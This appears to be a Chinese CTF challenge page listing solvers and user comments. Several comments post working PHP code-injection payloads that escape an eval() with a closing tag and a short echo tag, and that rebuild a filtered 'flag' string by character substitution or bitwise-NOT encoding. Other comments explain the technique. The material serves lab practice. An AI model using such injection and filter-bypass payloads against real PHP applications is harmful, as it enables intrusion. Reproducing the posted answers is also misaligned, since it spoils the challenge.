评分(6)
解题动态
ljy1997 攻破了该题 1天前
杰哥 攻破了该题 2天前
周文君 攻破了该题 2天前
不要逃课 攻破了该题 4天前
DcSyaA 攻破了该题 6天前
dacming9527 攻破了该题 7天前
话中语 攻破了该题 8天前
william5678 攻破了该题 8天前
vedkiyolo 攻破了该题 9天前
ggtom 攻破了该题 9天前
whitetower 攻破了该题 10天前
hulihaha 攻破了该题 10天前
fengci 攻破了该题 10天前
123-喻天心 攻破了该题 13天前
003-胡云涛 攻破了该题 13天前
085-文睿 攻破了该题 13天前
129-蔡国滨 攻破了该题 13天前
OvOawa 攻破了该题 14天前
zhengjim 攻破了该题 15天前
评论
周文君 2天前
举报
?flag=$a='fla1';$a{********}='g';?><?=$$a;?>111111111111111111
suxiansheng 19天前
举报
闭合绕过 + 短标签输出 详情参考https://blog.csdn.net/wangsu327/article/details/161545391?spm=1011.2124.3001.6209
FTJJJ 2月前
举报
?flag=$a=~'%99%93%9E%98';?><?= $$a ?>aaaaaaaaaaaaaaaaaaaaaaaaaa
harry2025 5月前
举报
eval()内出现孤立<,必报unexpected '<'错误,无例外。
网恋秀牛子被录屏导致自卑 5月前
举报
考察了闭合,还有短标签
南交混的入朱靖宇 6月前
举报
flag被过滤,构建$a='fla1';$a{*********}='g'; // 把字符串的第 4 个字符改成 g题里要求:strlen($_GET['flag']) == strlen($exam),而 $exam 的长度是 49。
Alune 7月前
举报
个人理解eval构造中存在<? ?> payload 第一个?>中与前一个闭合 而让后面的当作代码执行,不闭合的话后面就是<? <? ?> ?>代码嵌套代码了,会报错
孙谦的鸟岛 9月前
举报
孙千的**来咯
派大星CTF 1年前
举报
eavl()会开启新的php标签,而不是闭合第一行代码的标签所以需要结束eval里开启的标签,在开启一个php代码来执行输出$flag
YUMEKO 2年前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333